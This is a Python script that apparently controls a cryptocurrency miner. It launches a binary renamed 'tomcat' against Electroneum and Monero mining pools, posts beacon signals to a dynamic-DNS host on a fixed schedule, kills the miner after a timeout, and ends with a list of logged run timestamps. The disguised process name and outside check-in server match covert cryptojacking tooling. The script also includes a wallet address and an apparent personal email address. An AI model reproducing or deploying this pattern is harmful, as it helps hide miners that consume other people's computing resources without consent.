import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:03.631252
#2018-02-17 17:14:05.133332
#2018-02-17 19:02:05.276164
#2018-02-17 20:50:03.287490
#2018-02-17 22:36:01.448570
#2018-02-18 00:19:06.356910
#2018-02-18 02:10:05.057020
#2018-02-18 03:57:03.968142
#2018-02-18 05:44:03.639926
#2018-02-18 07:37:04.513221
#2018-02-18 09:24:04.022468
#2018-02-18 11:09:04.823760
#2018-02-18 12:55:07.614267
#2018-02-18 14:42:01.856308
#2018-02-18 16:31:01.400870
#2018-02-18 18:20:06.351178
#2018-02-18 20:05:07.573814
#2018-02-18 21:53:01.507784
#2018-02-18 23:42:05.204345
#2018-02-19 01:27:06.813770
#2018-02-19 03:16:04.347060
#2018-02-19 05:00:10.874132
#2018-02-19 06:46:05.160431
#2018-02-19 08:35:06.917076
#2018-02-19 10:24:02.095598
#2018-02-19 12:11:09.150231
#2018-02-19 13:58:01.400872
#2018-02-19 15:46:11.073049
#2018-02-19 17:33:01.554515
#2018-02-19 19:19:05.797034
#2018-02-19 21:06:06.701468
#2018-02-19 22:52:05.691611
#2018-02-20 00:35:06.631778
#2018-02-20 02:23:07.930801
#2018-02-20 04:13:04.469010
#2018-02-20 05:56:06.220839
#2018-02-20 07:42:05.935076
#2018-02-20 09:26:07.902922
#2018-02-20 11:10:06.979357
#2018-02-20 12:57:05.224073
#2018-02-20 14:41:06.823387
#2018-02-20 16:27:06.531000
#2018-02-20 18:13:09.772821
#2018-02-20 20:04:05.655375
#2018-02-20 21:50:08.014804
#2018-02-20 23:32:07.716626
#2018-02-21 01:17:07.703338
#2018-02-21 03:04:04.216038
#2018-02-21 04:51:04.040934
#2018-02-21 06:40:10.659423
#2018-02-21 08:27:08.192565
#2018-02-21 10:13:05.334014
#2018-02-21 12:01:09.013606
#2018-02-21 13:49:08.343751
#2018-02-21 15:35:04.099537
#2018-02-21 17:24:10.524120
#2018-02-21 19:13:07.308470
#2018-02-21 20:59:06.686916
#2018-02-21 22:46:06.152554
#2018-02-22 00:35:03.982949
#2018-02-22 02:21:08.218385
#2018-02-22 04:08:05.136976
#2018-02-22 05:53:01.701461
#2018-02-22 07:39:05.444421
#2018-02-22 09:27:06.694759
#2018-02-22 11:14:07.707179
#2018-02-22 12:59:07.101661
#2018-02-22 14:47:11.120608
#2018-02-22 16:35:07.871811
#2018-02-22 18:20:13.346529
#2018-02-22 20:13:04.390124
#2018-02-22 21:59:01.514330
#2018-02-22 23:46:01.600543
#2018-02-23 01:36:05.876716
#2018-02-23 03:22:01.464410
#2018-02-23 05:08:07.142853
#2018-02-23 06:54:06.857372
#2018-02-23 08:45:04.612860
#2018-02-23 11:02:06.485036
#2018-02-23 12:57:08.576808
#2018-02-23 14:44:01.279211
#2018-02-23 16:32:07.266891
#2018-02-23 18:18:02.079601
#2018-02-23 20:02:02.259271
#2018-02-23 21:45:10.875612
#2018-02-23 23:38:05.720259
#2018-02-24 01:27:05.616156
#2018-02-24 03:18:01.536164
#2018-02-24 05:03:03.665504
#2018-02-24 06:51:05.322130
#2018-02-24 08:43:03.257070
#2018-02-24 10:27:07.199420
#2018-02-24 12:22:06.330772
#2018-02-24 14:14:03.780045
#2018-02-24 16:01:07.240050
#2018-02-24 17:55:08.537336
#2018-02-24 19:43:01.876541
#2018-02-24 21:29:07.872772
#2018-02-25 01:53:05.570073
#2018-02-25 05:01:07.417842
#2018-02-25 09:50:01.474250